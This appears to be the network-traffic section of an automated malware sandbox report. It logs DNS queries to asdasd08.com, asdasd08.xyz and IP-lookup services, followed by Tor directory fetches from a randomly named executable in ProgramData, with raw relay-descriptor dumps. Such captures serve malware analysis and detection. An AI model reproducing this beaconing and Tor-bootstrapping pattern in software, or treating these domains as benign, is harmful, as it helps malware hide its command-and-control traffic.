                          Dec 11, 2022 09:26:56.916266918 CET192.168.2.38.8.8.80x6df9Standard query (0)ip4.seeip.orgA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Dec 11, 2022 09:25:03.753731966 CET8.8.8.8192.168.2.30x4bdcNo error (0)asdasd08.com34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:04.234843969 CET8.8.8.8192.168.2.30x52aeNo error (0)asdasd08.xyz34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:04.640944004 CET8.8.8.8192.168.2.30xb488No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                          Dec 11, 2022 09:25:04.640944004 CET8.8.8.8192.168.2.30xb488No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:04.640944004 CET8.8.8.8192.168.2.30xb488No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:04.640944004 CET8.8.8.8192.168.2.30xb488No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:50.689662933 CET8.8.8.8192.168.2.30xacb3No error (0)asdasd08.com34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:51.164469957 CET8.8.8.8192.168.2.30xc8ccNo error (0)asdasd08.xyz34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:51.547856092 CET8.8.8.8192.168.2.30x4a8eNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                          Dec 11, 2022 09:25:51.547856092 CET8.8.8.8192.168.2.30x4a8eNo error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:51.547856092 CET8.8.8.8192.168.2.30x4a8eNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:25:51.547856092 CET8.8.8.8192.168.2.30x4a8eNo error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:31.424376965 CET8.8.8.8192.168.2.30xcd44No error (0)asdasd08.com34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:31.786986113 CET8.8.8.8192.168.2.30xef64No error (0)asdasd08.xyz34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:32.155718088 CET8.8.8.8192.168.2.30xd059No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                          Dec 11, 2022 09:26:32.155718088 CET8.8.8.8192.168.2.30xd059No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:32.155718088 CET8.8.8.8192.168.2.30xd059No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:32.155718088 CET8.8.8.8192.168.2.30xd059No error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.179779053 CET8.8.8.8192.168.2.30xdb49No error (0)asdasd08.com34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.542290926 CET8.8.8.8192.168.2.30x7d7bNo error (0)asdasd08.xyz34.171.171.32A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.912317991 CET8.8.8.8192.168.2.30xabccNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                          Dec 11, 2022 09:26:46.912317991 CET8.8.8.8192.168.2.30xabccNo error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.912317991 CET8.8.8.8192.168.2.30xabccNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:46.912317991 CET8.8.8.8192.168.2.30xabccNo error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                          Dec 11, 2022 09:26:56.935348988 CET8.8.8.8192.168.2.30x6df9No error (0)ip4.seeip.org23.128.64.141A (IP address)IN (0x0001)false
                          • api.ipify.org
                          • ip4.seeip.org
                          • 131.188.40.189
                          • 151.20.208.221
                          • 77.7.81.140
                          • 193.23.244.244
                          • 84.144.111.46
                          • 86.59.21.38
                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.34969164.185.227.156443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.34971864.185.227.156443C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          10192.168.2.349707151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:22.132072926 CET2680OUTGET /tor/server/fp/38cc95a8ce92a591d4a5779359beffba13fa1b88 HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:22.184287071 CET2682INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:22 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:22 GMT
                          Data Raw: 72 6f 75 74 65 72 20 54 79 6b 52 65 6c 61 79 30 32 20 39 35 2e 32 31 36 2e 31 30 31 2e 32 34 37 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 55 72 41 55 32 49 64 6d 61 4e 62 69 6d 47 58 76 61 35 4e 53 6f 72 42 36 6a 7a 6b 4c 37 77 4d 62 36 6c 57 71 49 57 63 35 2f 74 37 37 4e 57 41 51 41 67 42 41 44 4f 35 49 68 73 0a 61 79 4f 70 57 69 31 62 2f 68 67 65 55 51 74 4b 63 51 34 78 4f 4b 66 79 57 6f 56 4f 54 64 70 2f 39 74 78 33 77 4b 77 55 76 77 47 6a 6c 64 4c 39 49 72 7a 50 77 66 62 76 68 4e 4b 37 30 35 69 47 0a 72 78 79 78 6c 2b 66 4d 69 67 47 4b 54 74 39 30 78 6f 44 76 76 46 51 31 50 51 6f 4a 2b 4b 2b 35 42 78 50 48 54 33 71 49 4d 2f 32 50 73 65 44 41 6a 47 44 35 4e 4b 76 65 35 67 41 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 7a 75 53 49 62 47 73 6a 71 56 6f 74 57 2f 34 59 48 6c 45 4c 53 6e 45 4f 4d 54 69 6e 38 6c 71 46 54 6b 33 61 66 2f 62 63 64 38 41 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 31 3a 34 66 39 3a 32 62 3a 31 35 31 66 3a 39 35 3a 32 31 36 3a 31 30 31 3a 32 34 37 5d 3a 34 34 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 30 20 6f 6e 20 46 72 65 65 42 53 44 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 32 30 3a 34 37 3a 31 34 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 43 43 20 39 35 41 38 20 43 45 39 32 20 41 35 39 31 20 44 34 41 35 20 37 37 39 33 20 35 39 42 45 20 46 46 42 41 20 31 33 46 41 20 31 42 38 38 0a 75 70 74 69 6d 65 20 33 30 36 30 30 33 36 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 32 39 36 34 31 31 31 34 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 44 35 43 39 37 35 32 36 43 30 43 33 43 46 38 46 41 34 39 44 43 39 38 30 37 39 45 33 33 41 35 38 35 35 39 45 45 45 33 44 20 61 74 4d 42 48 32 52 33 36 36 72 76 5a 74 59 6c 71 6c 79 58 62 32 34 6c 37 4a 6f 62 47 44 69 35 4a 51 65 67 39 61 43 70 73 54 30 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4c 45 46 49 58 78 51 6c 6f 6f 73 51 54 69 48 52 32 48 33 42 76 31 77 4b 68 74 37 38 76 69 34 50 64 38 30 33 70 4e 32 6a 6b 6f 74 78 4c 77 74 66 46 4a 76 49 50 4a 78 0a 52 38 53 32 71 72 31 6a 55 53 6b 59 61 31 56 6b 31 52 52 70 6f 39 79 5a 50 6d 72 63 77 39 54 6d 6c 78 4d 78 75 34 55 4d 44 30 4e 58 6b 36 72 6e 77 61 5a 49 72 36 30 71 79 41 63 50 64 6e 70 34 0a 48 31 50 55 4b 54 77 4a 34 4b 75 6d 49 38 6b 37 34 69 6a 34 43 6c 52 62 38 6b 37 48 73 46 6b 51 6f 62 4a 31 43 2b 4d 61 59 56 53 68 53 32 37 66 49 49 6f 78 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67
                          Data Ascii: router TykRelay02 95.216.101.247 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxUrAU2IdmaNbimGXva5NSorB6jzkL7wMb6lWqIWc5/t77NWAQAgBADO5IhsayOpWi1b/hgeUQtKcQ4xOKfyWoVOTdp/9tx3wKwUvwGjldL9IrzPwfbvhNK705iGrxyxl+fMigGKTt90xoDvvFQ1PQoJ+K+5BxPHT3qIM/2PseDAjGD5NKve5gA=-----END ED25519 CERT-----master-key-ed25519 zuSIbGsjqVotW/4YHlELSnEOMTin8lqFTk3af/bcd8Aor-address [2a01:4f9:2b:151f:95:216:101:247]:443platform Tor 0.4.7.10 on FreeBSDproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 20:47:14fingerprint 38CC 95A8 CE92 A591 D4A5 7793 59BE FFBA 13FA 1B88uptime 3060036bandwidth 1073741824 1073741824 29641114extra-info-digest D5C97526C0C3CF8FA49DC98079E33A58559EEE3D atMBH2R366rvZtYlqlyXb24l7JobGDi5JQeg9aCpsT0onion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBALEFIXxQloosQTiHR2H3Bv1wKht78vi4Pd803pN2jkotxLwtfFJvIPJxR8S2qr1jUSkYa1Vk1RRpo9yZPmrcw9TmlxMxu4UMD0NXk6rnwaZIr60qyAcPdnp4H1PUKTwJ4KumI8k74ij4ClRb8k7HsFkQobJ1C+MaYVShS27fIIoxAgMBAAE=-----END RSA PUBLIC KEY-----signing


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          11192.168.2.349708151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:23.558979988 CET2689OUTGET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:23.622694969 CET2690INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:23 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:23 GMT
                          Data Raw: 72 6f 75 74 65 72 20 55 6e 6e 61 6d 65 64 20 31 34 34 2e 32 31 37 2e 39 35 2e 31 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 68 41 56 35 4d 4f 7a 73 6c 64 30 72 7a 33 74 35 74 63 68 77 6b 4d 35 6e 45 4a 38 30 31 32 42 72 4b 42 59 4b 63 6f 38 4a 31 2f 32 47 42 41 51 41 67 42 41 41 6c 6c 66 4e 36 0a 48 5a 38 4d 73 39 51 59 53 72 4a 36 79 61 66 4e 49 55 43 39 33 4e 49 6b 37 6f 50 49 71 54 4b 50 75 5a 35 61 4c 7a 32 6d 6b 33 79 51 41 42 51 78 78 79 2b 31 66 48 61 52 32 6a 4c 33 53 42 6a 66 0a 4c 33 76 36 30 6f 53 6b 77 6b 6f 5a 6f 6c 5a 51 2b 6c 71 7a 63 33 35 4c 74 6c 66 54 37 62 61 51 69 77 64 58 6f 73 57 39 6f 75 70 39 32 51 74 34 43 70 64 56 36 65 41 6f 74 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4a 5a 58 7a 65 68 32 66 44 4c 50 55 47 45 71 79 65 73 6d 6e 7a 53 46 41 76 64 7a 53 4a 4f 36 44 79 4b 6b 79 6a 37 6d 65 57 69 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 36 30 37 3a 35 33 30 30 3a 32 30 31 3a 33 30 30 30 3a 3a 34 39 62 65 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 30 20 31 39 3a 32 35 3a 35 35 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 38 38 38 35 20 45 41 36 46 20 37 34 41 36 20 39 34 38 32 20 35 42 31 33 20 42 38 41 37 20 30 38 30 46 20 36 43 46 31 20 36 34 44 46 20 37 34 46 42 0a 75 70 74 69 6d 65 20 31 39 32 32 33 30 0a 62 61 6e 64 77 69 64 74 68 20 31 30 37 33 37 34 31 38 32 34 20 31 30 37 33 37 34 31 38 32 34 20 31 36 30 35 36 32 35 35 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 45 46 34 44 32 39 38 31 32 43 45 44 32 35 38 41 45 36 38 35 33 30 32 35 34 43 39 31 46 41 31 38 45 42 42 45 43 43 30 34 20 66 58 38 38 55 33 65 73 39 42 63 4b 4f 48 31 74 57 55 57 34 59 62 6a 4b 70 58 39 30 6f 36 65 6a 56 5a 4b 72 56 39 74 44 68 63 59 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 4b 6f 6c 6d 4d 4b 31 4d 4a 6a 51 37 6b 44 53 53 73 58 58 7a 48 79 6c 45 71 31 75 57 76 57 61 37 79 39 6a 71 2f 2f 67 74 47 6b 78 30 6a 6f 41 2b 4d 57 50 54 32 30 0a 42 74 79 69 64 4f 53 5a 32 71 67 4e 31 64 2f 33 55 49 6c 4b 49 78 69 4d 37 4c 61 57 61 66 63 76 76 75 4c 73 57 55 65 61 79 5a 47 73 6b 39 56 79 71 59 65 67 30 6e 6a 69 64 50 47 32 37 33 2f 32 0a 37 49 50 31 65 7a 4e 37 48 2f 6a 6d 4e 4f 75 47 39 4a 75 77 4c 71 44 38 41 4d 79 52 75 75 66 73 66 38 48 66 43 45 74 75 57 48 58 2f 4a 2b 49 32 46 5a 79 4e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47
                          Data Ascii: router Unnamed 144.217.95.12 9001 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxdhAV5MOzsld0rz3t5tchwkM5nEJ8012BrKBYKco8J1/2GBAQAgBAAllfN6HZ8Ms9QYSrJ6yafNIUC93NIk7oPIqTKPuZ5aLz2mk3yQABQxxy+1fHaR2jL3SBjfL3v60oSkwkoZolZQ+lqzc35LtlfT7baQiwdXosW9oup92Qt4CpdV6eAotgM=-----END ED25519 CERT-----master-key-ed25519 JZXzeh2fDLPUGEqyesmnzSFAvdzSJO6DyKkyj7meWi8or-address [2607:5300:201:3000::49be]:9001platform Tor 0.4.7.7 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-10 19:25:55fingerprint 8885 EA6F 74A6 9482 5B13 B8A7 080F 6CF1 64DF 74FBuptime 192230bandwidth 1073741824 1073741824 16056255extra-info-digest EF4D29812CED258AE68530254C91FA18EBBECC04 fX88U3es9BcKOH1tWUW4YbjKpX90o6ejVZKrV9tDhcYonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMKolmMK1MJjQ7kDSSsXXzHylEq1uWvWa7y9jq//gtGkx0joA+MWPT20BtyidOSZ2qgN1d/3UIlKIxiM7LaWafcvvuLsWUeayZGsk9VyqYeg0njidPG273/27IP1ezN7H/jmNOuG9JuwLqD8AMyRuufsf8HfCEtuWHX/J+I2FZyNAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-----BEG


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          12192.168.2.349709151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:24.075264931 CET2693OUTGET /tor/server/fp/38e73023a9792cdb8adcd4d1b2a220effe8d8ff5 HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:24.188304901 CET2695INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:24 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:24 GMT
                          Data Raw: 72 6f 75 74 65 72 20 61 6c 70 68 61 31 33 37 20 37 30 2e 33 34 2e 31 39 34 2e 31 38 39 20 34 34 33 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 5a 56 41 56 54 66 5a 64 74 58 6d 6f 41 30 49 39 55 38 77 78 48 49 64 5a 33 69 63 68 55 7a 74 2f 70 35 4c 50 33 72 53 6a 72 55 71 2f 61 73 41 51 41 67 42 41 43 2b 6f 61 2f 75 0a 50 51 33 57 34 4f 48 6b 49 76 37 79 2f 2f 52 32 7a 6f 36 39 44 37 6b 4f 74 67 42 43 55 77 33 73 50 65 66 55 70 2b 52 31 66 65 33 78 2b 69 65 46 49 46 66 2b 67 78 4f 75 6c 74 57 63 45 55 61 41 0a 77 53 56 42 78 69 6f 55 47 77 71 33 35 32 4d 63 79 76 65 33 67 58 50 43 56 32 73 37 61 53 77 50 61 79 57 6a 68 72 47 57 52 78 78 2f 76 54 61 50 6e 46 63 62 55 56 66 4a 66 67 67 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 76 71 47 76 37 6a 30 4e 31 75 44 68 35 43 4c 2b 38 76 2f 30 64 73 36 4f 76 51 2b 35 44 72 59 41 51 6c 4d 4e 37 44 33 6e 31 4b 63 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 61 30 35 3a 66 34 38 30 3a 32 30 30 30 3a 32 66 66 64 3a 35 34 30 30 3a 34 66 66 3a 66 65 32 37 3a 62 34 34 62 5d 3a 34 34 33 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 31 31 20 6f 6e 20 4c 69 6e 75 78 0a 70 72 6f 74 6f 20 43 6f 6e 73 3d 31 2d 32 20 44 65 73 63 3d 31 2d 32 20 44 69 72 43 61 63 68 65 3d 32 20 46 6c 6f 77 43 74 72 6c 3d 31 2d 32 20 48 53 44 69 72 3d 32 20 48 53 49 6e 74 72 6f 3d 34 2d 35 20 48 53 52 65 6e 64 3d 31 2d 32 20 4c 69 6e 6b 3d 31 2d 35 20 4c 69 6e 6b 41 75 74 68 3d 31 2c 33 20 4d 69 63 72 6f 64 65 73 63 3d 31 2d 32 20 50 61 64 64 69 6e 67 3d 32 20 52 65 6c 61 79 3d 31 2d 34 0a 70 75 62 6c 69 73 68 65 64 20 32 30 32 32 2d 31 32 2d 31 31 20 30 33 3a 35 32 3a 31 34 0a 66 69 6e 67 65 72 70 72 69 6e 74 20 33 38 45 37 20 33 30 32 33 20 41 39 37 39 20 32 43 44 42 20 38 41 44 43 20 44 34 44 31 20 42 32 41 32 20 32 30 45 46 20 46 45 38 44 20 38 46 46 35 0a 75 70 74 69 6d 65 20 36 34 38 30 35 35 0a 62 61 6e 64 77 69 64 74 68 20 32 38 36 37 32 30 30 20 36 31 34 34 30 30 30 20 33 30 35 37 34 30 38 0a 65 78 74 72 61 2d 69 6e 66 6f 2d 64 69 67 65 73 74 20 35 45 36 33 34 39 43 35 46 32 34 35 35 34 45 44 39 43 42 38 34 31 42 42 39 44 39 32 31 46 32 41 33 39 30 30 36 43 32 42 20 75 50 69 59 50 77 6f 66 33 51 4c 47 2f 6c 46 4d 59 5a 79 5a 45 47 75 57 75 6f 52 57 57 34 74 43 41 66 6b 2b 49 47 38 55 41 50 51 0a 6f 6e 69 6f 6e 2d 6b 65 79 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 47 4a 41 6f 47 42 41 4d 58 4b 46 6c 67 30 44 33 62 6a 71 73 41 43 44 34 78 77 41 54 35 59 43 78 78 65 42 4c 54 31 4f 49 73 42 7a 66 32 79 50 42 69 44 37 33 33 64 48 41 36 71 42 75 51 70 0a 67 77 61 6e 2f 42 75 4e 61 71 30 6b 74 39 71 35 30 58 39 36 42 42 58 30 6c 37 73 6c 37 6a 61 70 78 39 2f 50 76 67 64 4d 30 2b 59 74 4f 55 74 48 61 71 4c 41 35 79 68 50 66 52 42 48 58 2b 31 4e 0a 4d 65 2b 6b 59 51 69 46 74 64 44 55 57 49 49 7a 4c 74 49 6f 74 44 34 77 67 4b 4a 4c 6d 66 36 4c 6b 53 4e 63 38 47 53 66 54 5a 4b 32 70 74 53 52 36 4f 6d 6e 41 67 4d 42 41 41 45 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 73 69 67 6e 69 6e 67 2d 6b 65 79 0a 2d
                          Data Ascii: router alpha137 70.34.194.189 443 0 0identity-ed25519-----BEGIN ED25519 CERT-----AQQABxZVAVTfZdtXmoA0I9U8wxHIdZ3ichUzt/p5LP3rSjrUq/asAQAgBAC+oa/uPQ3W4OHkIv7y//R2zo69D7kOtgBCUw3sPefUp+R1fe3x+ieFIFf+gxOultWcEUaAwSVBxioUGwq352Mcyve3gXPCV2s7aSwPayWjhrGWRxx/vTaPnFcbUVfJfgg=-----END ED25519 CERT-----master-key-ed25519 vqGv7j0N1uDh5CL+8v/0ds6OvQ+5DrYAQlMN7D3n1Kcor-address [2a05:f480:2000:2ffd:5400:4ff:fe27:b44b]:443platform Tor 0.4.7.11 on Linuxproto Cons=1-2 Desc=1-2 DirCache=2 FlowCtrl=1-2 HSDir=2 HSIntro=4-5 HSRend=1-2 Link=1-5 LinkAuth=1,3 Microdesc=1-2 Padding=2 Relay=1-4published 2022-12-11 03:52:14fingerprint 38E7 3023 A979 2CDB 8ADC D4D1 B2A2 20EF FE8D 8FF5uptime 648055bandwidth 2867200 6144000 3057408extra-info-digest 5E6349C5F24554ED9CB841BB9D921F2A39006C2B uPiYPwof3QLG/lFMYZyZEGuWuoRWW4tCAfk+IG8UAPQonion-key-----BEGIN RSA PUBLIC KEY-----MIGJAoGBAMXKFlg0D3bjqsACD4xwAT5YCxxeBLT1OIsBzf2yPBiD733dHA6qBuQpgwan/BuNaq0kt9q50X96BBX0l7sl7japx9/PvgdM0+YtOUtHaqLA5yhPfRBHX+1NMe+kYQiFtdDUWIIzLtIotD4wgKJLmf6LkSNc8GSfTZK2ptSR6OmnAgMBAAE=-----END RSA PUBLIC KEY-----signing-key-


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          13192.168.2.349710151.20.208.2219030C:\ProgramData\prfxiau\orvsmwx.exe
                          TimestampkBytes transferredDirectionData
                          Dec 11, 2022 09:25:44.322722912 CET2698OUTGET /tor/server/fp/8885ea6f74a694825b13b8a7080f6cf164df74fb HTTP/1.0
                          Host: 151.20.208.221
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                          Connection: close
                          Dec 11, 2022 09:25:44.375762939 CET2699INHTTP/1.0 200 OK
                          Date: Sun, 11 Dec 2022 08:25:44 GMT
                          Content-Type: text/plain
                          X-Your-Address-Is: 84.17.52.51
                          Content-Encoding: identity
                          Expires: Tue, 13 Dec 2022 08:25:44 GMT
                          Data Raw: 72 6f 75 74 65 72 20 55 6e 6e 61 6d 65 64 20 31 34 34 2e 32 31 37 2e 39 35 2e 31 32 20 39 30 30 31 20 30 20 30 0a 69 64 65 6e 74 69 74 79 2d 65 64 32 35 35 31 39 0a 2d 2d 2d 2d 2d 42 45 47 49 4e 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 41 51 51 41 42 78 64 68 41 56 35 4d 4f 7a 73 6c 64 30 72 7a 33 74 35 74 63 68 77 6b 4d 35 6e 45 4a 38 30 31 32 42 72 4b 42 59 4b 63 6f 38 4a 31 2f 32 47 42 41 51 41 67 42 41 41 6c 6c 66 4e 36 0a 48 5a 38 4d 73 39 51 59 53 72 4a 36 79 61 66 4e 49 55 43 39 33 4e 49 6b 37 6f 50 49 71 54 4b 50 75 5a 35 61 4c 7a 32 6d 6b 33 79 51 41 42 51 78 78 79 2b 31 66 48 61 52 32 6a 4c 33 53 42 6a 66 0a 4c 33 76 36 30 6f 53 6b 77 6b 6f 5a 6f 6c 5a 51 2b 6c 71 7a 63 33 35 4c 74 6c 66 54 37 62 61 51 69 77 64 58 6f 73 57 39 6f 75 70 39 32 51 74 34 43 70 64 56 36 65 41 6f 74 67 4d 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 45 44 32 35 35 31 39 20 43 45 52 54 2d 2d 2d 2d 2d 0a 6d 61 73 74 65 72 2d 6b 65 79 2d 65 64 32 35 35 31 39 20 4a 5a 58 7a 65 68 32 66 44 4c 50 55 47 45 71 79 65 73 6d 6e 7a 53 46 41 76 64 7a 53 4a 4f 36 44 79 4b 6b 79 6a 37 6d 65 57 69 38 0a 6f 72 2d 61 64 64 72 65 73 73 20 5b 32 36 30 37 3a 35 33 30 30 3a 32 30 31 3a 33 30 30 30 3a 3a 34 39 62 65 5d 3a 39 30 30 31 0a 70 6c 61 74 66 6f 72 6d 20 54 6f 72 20 30 2e 34 2e 37 2e 37 20 6f 6e 20 4c 69 6e 75 78 0a 